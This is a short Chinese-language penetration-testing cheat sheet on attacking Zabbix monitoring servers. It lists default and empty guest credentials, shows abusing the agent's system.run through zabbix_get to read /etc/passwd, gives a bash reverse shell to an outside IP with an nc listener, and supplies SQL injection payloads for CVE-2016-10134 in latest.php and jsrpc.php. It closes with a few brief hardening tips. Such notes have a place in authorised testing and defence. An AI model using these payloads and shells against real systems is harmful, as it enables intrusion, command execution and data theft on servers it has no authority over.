1. Zabbix配置不當安全事件
- sohu的zabbix,可導致內網滲透
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627
- 京東某站shell直入jae內網物理機內核版本過低
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349
2. Zabbix弱口令利用
- zabbix默認的口令爲Admin:zabbix,並且存在guest賬戶密碼爲空。
- Zabbix server可以遠程在agent的機器上執行任意命令
3. 建立監控項
- zabbix_get命令調用
system.run[command,<mode>] # 這個模塊是agent自帶的,獲取服務器shell,獲取root權限。
- 反彈提權
bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc -lvp 6666
- zabbix_get命令調用:
zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'
4. Zabbix注入
- latest.php SQL注入漏洞(CVE-2016-10134)
Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0
# 用來賓賬號的session的後6位 替換鏈接的sid ,即可通過user() 調用出當前的啓動用戶
- 直接訪問,不需要其他的東西
jsrpc.php? type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
-
除此之外,還可以使用BurpSuite爆破口令
-
防護措施
- 不要放外網
- 修改默認密碼
- 禁用guest 用戶
- 不要以root啓動
- 401認證
- 備份數據 -> 升級版本
- 做測試找漏洞